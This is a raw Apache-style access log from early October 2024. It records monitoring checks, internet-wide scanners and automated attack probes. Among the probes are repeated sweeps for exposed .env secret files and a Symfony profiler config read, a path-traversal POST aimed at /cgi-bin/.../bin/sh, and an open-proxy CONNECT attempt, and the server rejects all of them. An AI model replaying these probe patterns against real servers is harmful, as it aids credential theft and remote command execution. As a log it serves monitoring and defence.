212.91.246.72 - - [02/Oct/2024:23:48:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Oct/2024:23:49:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
47.88.5.56 - - [02/Oct/2024:23:50:05 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Linux; Android 10; LIO-AN00 Build/HUAWEILIO-AN00; wv) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.114 Mobile Safari/537.36"
47.88.5.56 - - [02/Oct/2024:23:50:08 +0200] "GET /Public/home/js/check.js HTTP/1.1" 404 328 "-" "Mozilla/5.0 (Linux; Android 10; LIO-AN00 Build/HUAWEILIO-AN00; wv) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.114 Mobile Safari/537.36"
47.251.13.32 - - [02/Oct/2024:23:50:13 +0200] "GET /static/admin/javascript/hetong.js HTTP/1.1" 404 338 "-" "Mozilla/5.0 (Linux; Android 10; LIO-AN00 Build/HUAWEILIO-AN00; wv) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.114 Mobile Safari/537.36"
212.91.246.72 - - [02/Oct/2024:23:50:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Oct/2024:23:51:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Oct/2024:23:52:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Oct/2024:23:53:19 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Oct/2024:23:54:19 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.16.39.118 - - [02/Oct/2024:23:54:38 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
178.211.139.188 - - [02/Oct/2024:23:54:58 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
212.91.246.72 - - [02/Oct/2024:23:55:19 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.16.39.118 - - [02/Oct/2024:23:56:00 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
212.91.246.72 - - [02/Oct/2024:23:56:19 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Oct/2024:23:57:19 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Oct/2024:23:58:19 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
137.74.239.149 - - [02/Oct/2024:23:58:26 +0200] "\x16\x03\x03\x01\xa6\x01" 501 321 "-" "-"
137.74.239.153 - - [02/Oct/2024:23:58:30 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:130.0) Gecko/20100101 Firefox/130.0"
212.91.246.72 - - [02/Oct/2024:23:59:20 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2024:00:00:20 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2024:00:01:20 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2024:00:02:20 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
71.6.134.233 - - [03/Oct/2024:00:02:33 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.0.0 Safari/537.36"
212.91.246.72 - - [03/Oct/2024:00:03:20 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2024:00:04:20 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
71.6.134.233 - - [03/Oct/2024:00:05:01 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.0.0 Safari/537.36"
212.91.246.72 - - [03/Oct/2024:00:05:21 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
87.236.176.222 - - [03/Oct/2024:00:06:20 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)"
212.91.246.72 - - [03/Oct/2024:00:06:21 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
167.94.145.111 - - [03/Oct/2024:00:06:23 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
167.94.145.111 - - [03/Oct/2024:00:06:26 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.145.111 - - [03/Oct/2024:00:06:27 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.145.111 - - [03/Oct/2024:00:06:27 +0200] "PRI * HTTP/2.0" 400 329 "-" "-"
212.91.246.72 - - [03/Oct/2024:00:07:21 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
194.48.251.199 - - [03/Oct/2024:00:07:48 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
212.91.246.72 - - [03/Oct/2024:00:08:21 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2024:00:09:21 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2024:00:10:21 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2024:00:11:22 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2024:00:12:22 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
149.50.103.48 - - [03/Oct/2024:00:13:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
162.142.125.218 - - [03/Oct/2024:00:14:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
162.142.125.218 - - [03/Oct/2024:00:14:52 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
162.142.125.218 - - [03/Oct/2024:00:14:52 +0200] "PRI * HTTP/2.0" 400 329 "-" "-"
185.16.39.118 - - [03/Oct/2024:00:16:31 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
185.16.39.118 - - [03/Oct/2024:00:18:27 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
138.197.15.3 - - [03/Oct/2024:00:18:31 +0200] "GET /aaa9 HTTP/1.1" 404 309 "-" "Mozilla/5.0 zgrab/0.x"
138.197.15.3 - - [03/Oct/2024:00:18:34 +0200] "GET /aab8 HTTP/1.1" 404 309 "-" "Mozilla/5.0 zgrab/0.x"
138.197.15.3 - - [03/Oct/2024:00:18:38 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
185.191.126.213 - - [03/Oct/2024:00:20:48 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
185.191.126.213 - - [03/Oct/2024:00:21:53 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
149.50.103.48 - - [03/Oct/2024:00:23:04 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
141.98.11.79 - - [03/Oct/2024:00:24:10 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
149.50.103.48 - - [03/Oct/2024:00:26:40 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
149.50.103.48 - - [03/Oct/2024:00:27:59 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
78.153.140.223 - - [03/Oct/2024:00:32:48 +0200] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.28) Gecko/20120306 Firefox/3.6.28"
78.153.140.223 - - [03/Oct/2024:00:32:48 +0200] "\x16\x03\x01" 501 318 "-" "-"
78.153.140.223 - - [03/Oct/2024:00:32:49 +0200] "GET /laravel/.env HTTP/1.1" 404 317 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_2 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Mobile/13F69 Safari/601.1.46"
78.153.140.223 - - [03/Oct/2024:00:32:49 +0200] "GET /demo/.env HTTP/1.1" 404 314 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.803.0 Safari/535.1"
78.153.140.223 - - [03/Oct/2024:00:32:49 +0200] "GET /web/.env HTTP/1.1" 404 313 "-" "Konqueror/3.0-rc4; (Konqueror/3.0-rc4; i686 Linux;;datecode)"
78.153.140.223 - - [03/Oct/2024:00:32:49 +0200] "GET /admin/.env HTTP/1.1" 404 315 "-" "Mozilla/5.0 (Android 6.0; Mobile; rv:49.0) Gecko/49.0 Firefox/49.0"
78.153.140.223 - - [03/Oct/2024:00:32:50 +0200] "GET /backend/.env HTTP/1.1" 404 317 "-" "Opera/9.80 (Windows NT 5.1; U; fr) Presto/2.10.289 Version/12.02"
78.153.140.223 - - [03/Oct/2024:00:32:50 +0200] "GET /app/.env HTTP/1.1" 404 313 "-" "Opera/9.80 (X11; Linux x86_64; U; de) Presto/2.2.15 Version/10.00"
78.153.140.223 - - [03/Oct/2024:00:32:50 +0200] "GET /api/.env HTTP/1.1" 404 313 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X; it-it) AppleWebKit/416.12 (KHTML, like Gecko) Safari/416.13"
78.153.140.223 - - [03/Oct/2024:00:32:50 +0200] "GET /dev/.env HTTP/1.1" 404 313 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.1 Safari/605.1.15"
78.153.140.223 - - [03/Oct/2024:00:32:50 +0200] "GET /www/.env HTTP/1.1" 404 313 "-" "Opera/9.10 (Windows NT 5.2; U; en)"
78.153.140.223 - - [03/Oct/2024:00:32:51 +0200] "GET /home/.env HTTP/1.1" 404 314 "-" "Mozilla/5.0 (Windows NT 5.1; rv:2.0.1) Gecko/20100101 Firefox/4.0.1"
78.153.140.223 - - [03/Oct/2024:00:32:51 +0200] "GET /staging/.env HTTP/1.1" 404 317 "-" "Mozilla/5.0 (Linux; U; Android 4.0.3; zh-cn; SAGA A806 Build/IML74K) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30"
78.153.140.223 - - [03/Oct/2024:00:32:51 +0200] "GET /test/.env HTTP/1.1" 404 314 "-" "Mozilla/5.0 (X11; U; Linux i586; de; rv:5.0) Gecko/20100101 Firefox/5.0"
78.153.140.223 - - [03/Oct/2024:00:32:52 +0200] "GET /apps/.env HTTP/1.1" 404 314 "-" "Mozilla/5.0 (Macintosh; I; PPC Mac OS X Mach-O; en-US; rv:1.9a1) Gecko/20061204 Firefox/3.0a1"
78.153.140.223 - - [03/Oct/2024:00:32:52 +0200] "GET /app_dev.php/_profiler/phpinfo HTTP/1.1" 404 334 "-" "Mozilla/5.0 (X11; U; Linux x86_64; sv-SE; rv:1.9.0.7) Gecko/2009030423 Ubuntu/8.10 (intrepid) Firefox/3.0.7"
78.153.140.223 - - [03/Oct/2024:00:32:52 +0200] "GET /.json HTTP/1.1" 404 310 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.125 Safari/537.36 OPR/25.0.1614.71"
78.153.140.223 - - [03/Oct/2024:00:32:53 +0200] "GET /app_dev.php/_profiler/open?file=app/config/parameters.yml HTTP/1.1" 404 331 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7) Gecko/20040917 Firefox/0.9.3"
78.153.140.223 - - [03/Oct/2024:00:32:53 +0200] "GET /info/ HTTP/1.1" 404 310 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9) Gecko/2008052906 Firefox/3.0"
78.153.140.223 - - [03/Oct/2024:00:32:53 +0200] "GET /infos/ HTTP/1.1" 404 311 "-" "Opera/9.10 (X11; Linux; U; en)"
78.153.140.223 - - [03/Oct/2024:00:32:54 +0200] "GET /.env.production HTTP/1.1" 404 320 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_7; en-us) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.4 Safari/533.20.27"
78.153.140.223 - - [03/Oct/2024:00:32:54 +0200] "GET /vendor/.env HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Linux; U; Android 2.3.6; en-us; T-Mobile myTouch Build/HuaweiU8680) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1"
78.153.140.223 - - [03/Oct/2024:00:32:54 +0200] "GET /library/.env HTTP/1.1" 404 317 "-" "Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_1_3 like Mac OS X; en-us) AppleWebKit/528.18 (KHTML, like Gecko) Version/4.0 Mobile/7E18 Safari/528.16"
78.153.140.223 - - [03/Oct/2024:00:32:54 +0200] "GET /config/.env HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Linux; U; Android 4.1.2; en-CA; B1-710 Build/JZO54K) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.1 Safari/534.30"
78.153.140.223 - - [03/Oct/2024:00:32:55 +0200] "GET /application/.env HTTP/1.1" 404 321 "-" "Mozilla/5.0 (Windows; U; Windows NT based; en-US) AppleWebKit/528.18 (KHTML, like Gecko) Version/4.0 Safari/528.17"
78.153.140.223 - - [03/Oct/2024:00:32:55 +0200] "GET /App/.env HTTP/1.1" 404 313 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0"
78.153.140.223 - - [03/Oct/2024:00:32:55 +0200] "GET /APP/.env HTTP/1.1" 404 313 "-" "Mozilla/5.0 (Linux; U; Android 2.3.6; pt-pt; GT-S5360 Build/GINGERBREAD) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1"
78.153.140.223 - - [03/Oct/2024:00:32:55 +0200] "GET /APPS/.env HTTP/1.1" 404 314 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; WOW64; Trident/5.0; BOIE9;ENUS)"
78.153.140.223 - - [03/Oct/2024:00:32:55 +0200] "GET /Api/.env HTTP/1.1" 404 313 "-" "Mozilla/5.0 (Linux; Android 5.0.2; SAMSUNG-SM-G920A Build/LRX22G) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/3.0 Chrome/38.0.2125.102 Mobile Safari/537.36"
149.50.103.48 - - [03/Oct/2024:00:33:04 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
185.16.39.118 - - [03/Oct/2024:00:34:08 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
141.98.11.79 - - [03/Oct/2024:00:36:12 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
78.153.140.223 - - [03/Oct/2024:00:36:25 +0200] "\x16\x03\x01" 501 318 "-" "-"
78.153.140.223 - - [03/Oct/2024:00:36:25 +0200] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (Linux; U; Android 2.3.3; en-ca; GT-I9000M Build/GINGERBREAD) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1"
78.153.140.223 - - [03/Oct/2024:00:36:25 +0200] "GET /laravel/.env HTTP/1.1" 404 317 "-" "Mozilla/5.0 (Linux; Android 7.0; LGMP260 Build/NRD90U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.158 Mobile Safari/537.36"
78.153.140.223 - - [03/Oct/2024:00:36:25 +0200] "GET /demo/.env HTTP/1.1" 404 314 "-" "Mozilla/5.0 (X11; U; Linux i686; es-AR; rv:1.8.1.6) Gecko/20070803 Firefox/2.0.0.6 (Swiftfox)"
78.153.140.223 - - [03/Oct/2024:00:36:33 +0200] "GET /web/.env HTTP/1.1" 404 313 "-" "Opera/6.0 (Macintosh; PPC Mac OS X; U)"
78.153.140.223 - - [03/Oct/2024:00:36:35 +0200] "GET /admin/.env HTTP/1.1" 404 315 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36 OPR/48.0.2685.35"
78.153.140.223 - - [03/Oct/2024:00:36:40 +0200] "GET /backend/.env HTTP/1.1" 404 317 "-" "Mozilla/5.0 (Linux; U; Android 4.0.3; en-us; HTC_H2000C Build/IML74K) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30"
78.153.140.223 - - [03/Oct/2024:00:36:42 +0200] "GET /app/.env HTTP/1.1" 404 313 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.98 Safari/537.36 OPR/44.0.0.251023979 (Edition EXP135)"
78.153.140.223 - - [03/Oct/2024:00:36:42 +0200] "GET /api/.env HTTP/1.1" 404 313 "-" "Mozilla/5.0 (X11; RemixOS; CrOS x86_64; rv:50.0) Gecko/50 Firefox/50.0"
185.191.126.213 - - [03/Oct/2024:00:36:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
78.153.140.223 - - [03/Oct/2024:00:36:44 +0200] "GET /dev/.env HTTP/1.1" 404 313 "-" "Mozilla/5.0 (X11; ; Linux x86_64; rv:1.8.1.6) Gecko/20070802 Firefox"
78.153.140.223 - - [03/Oct/2024:00:36:46 +0200] "GET /www/.env HTTP/1.1" 404 313 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.101 Safari/537.36 OPR/40.0.2308.62"
78.153.140.223 - - [03/Oct/2024:00:36:49 +0200] "GET /home/.env HTTP/1.1" 404 314 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 8_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12F69 Safari/600.1.4"
78.153.140.223 - - [03/Oct/2024:00:36:50 +0200] "GET /staging/.env HTTP/1.1" 404 317 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)"
78.153.140.223 - - [03/Oct/2024:00:36:51 +0200] "GET /test/.env HTTP/1.1" 404 314 "-" "Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36"
78.153.140.223 - - [03/Oct/2024:00:36:58 +0200] "GET /apps/.env HTTP/1.1" 404 314 "-" "Opera/9.80 (Android; Opera Mini/24.0.2254/61.485; U; en) Presto/2.12.423 Version/12.16"
78.153.140.223 - - [03/Oct/2024:00:37:00 +0200] "GET /app_dev.php/_profiler/phpinfo HTTP/1.1" 404 334 "-" "Mozilla/4.0 (compatible; MSIE 6.0; X11; Linux x86_64; en) Opera 9.50"
78.153.140.223 - - [03/Oct/2024:00:37:05 +0200] "GET /.json HTTP/1.1" 404 310 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.0; de-DE; rv:1.6) Gecko/20040206 Firefox/0.8"
78.153.140.223 - - [03/Oct/2024:00:37:12 +0200] "GET /app_dev.php/_profiler/open?file=app/config/parameters.yml HTTP/1.1" 404 331 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDSJS)"
78.153.140.223 - - [03/Oct/2024:00:37:17 +0200] "GET /info/ HTTP/1.1" 404 310 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; Win64; x64; Trident/7.0)"
78.153.140.223 - - [03/Oct/2024:00:37:18 +0200] "GET /infos/ HTTP/1.1" 404 311 "-" "Mozilla/5.0 (Linux; U; Android 4.3; en-nz; GT-I9300 Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30"
78.153.140.223 - - [03/Oct/2024:00:37:22 +0200] "GET /.env.production HTTP/1.1" 404 320 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98;)"
78.153.140.223 - - [03/Oct/2024:00:37:26 +0200] "GET /vendor/.env HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.59 Safari/537.36"
78.153.140.223 - - [03/Oct/2024:00:37:31 +0200] "GET /library/.env HTTP/1.1" 404 317 "-" "Mozilla/5.0 (X11; U; Linux i686; pl; rv:1.8.1) Gecko/20061010 Firefox/2.0"
78.153.140.223 - - [03/Oct/2024:00:37:32 +0200] "GET /config/.env HTTP/1.1" 404 316 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 11_2_5 like Mac OS X) AppleWebKit/604.5.6 (KHTML, like Gecko) Version/11.0 Mobile/15D60 Safari/604.1"
78.153.140.223 - - [03/Oct/2024:00:37:33 +0200] "GET /application/.env HTTP/1.1" 404 321 "-" "Mozilla/5.0 (Linux; U; Android 2.3.5; en-us; TECNO N3 Build/master) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1"
78.153.140.223 - - [03/Oct/2024:00:37:36 +0200] "GET /App/.env HTTP/1.1" 404 313 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; Win64; x64; Trident/6.0; MATBJS)"
78.153.140.223 - - [03/Oct/2024:00:37:38 +0200] "GET /APP/.env HTTP/1.1" 404 313 "-" "More Firefox 1.5 user agents strings -->>"
78.153.140.223 - - [03/Oct/2024:00:37:39 +0200] "GET /APPS/.env HTTP/1.1" 404 314 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36 OPR/42.0.2393.94"
78.153.140.223 - - [03/Oct/2024:00:37:39 +0200] "GET /Api/.env HTTP/1.1" 404 313 "-" "Mozilla/5.0 (X11; U; Linux i686; fr; rv:1.8.1.4) Gecko/20070515 Firefox/2.0.0.4"
95.214.55.43 - - [03/Oct/2024:00:38:08 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
79.72.57.194 - - [03/Oct/2024:00:39:38 +0200] "POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1" 400 333 "-" "Custom-AsyncHttpClient"
141.98.11.79 - - [03/Oct/2024:00:40:13 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
185.16.39.118 - - [03/Oct/2024:00:40:42 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
185.191.126.213 - - [03/Oct/2024:00:42:14 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
149.50.103.48 - - [03/Oct/2024:00:43:09 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
147.135.23.107 - - [03/Oct/2024:00:44:49 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:130.0) Gecko/20100101 Firefox/130.0"
141.98.11.79 - - [03/Oct/2024:00:45:31 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
80.82.77.202 - - [03/Oct/2024:00:46:47 +0200] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (Linux; Android 9; EML-L09) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.89 Mobile Safari/537.36"
62.210.90.217 - - [03/Oct/2024:00:47:00 +0200] "HEAD / HTTP/1.1" 200 - "-" "curl/7.81.0"
62.210.90.217 - - [03/Oct/2024:00:47:02 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.3"
62.210.90.217 - - [03/Oct/2024:00:47:02 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.3"
62.210.90.217 - - [03/Oct/2024:00:47:02 +0200] "GET /ads.txt HTTP/1.1" 404 312 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.3"
62.210.90.217 - - [03/Oct/2024:00:47:02 +0200] "GET /app-ads.txt HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.3"
62.210.90.217 - - [03/Oct/2024:00:47:02 +0200] "GET /sellers.json HTTP/1.1" 404 317 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.3"
141.98.11.79 - - [03/Oct/2024:00:48:13 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
149.50.103.48 - - [03/Oct/2024:00:48:32 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
149.50.103.48 - - [03/Oct/2024:00:48:39 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
198.235.24.237 - - [03/Oct/2024:00:50:20 +0200] "GET / HTTP/1.0" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
95.214.55.43 - - [03/Oct/2024:00:50:24 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
154.213.187.108 - - [03/Oct/2024:00:50:59 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0"
154.213.187.244 - - [03/Oct/2024:00:51:21 +0200] "CONNECT google.com:443 HTTP/1.1" 405 340 "-" "Go-http-client/1.1"
205.210.31.9 - - [03/Oct/2024:00:52:18 +0200] "GET / HTTP/1.0" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
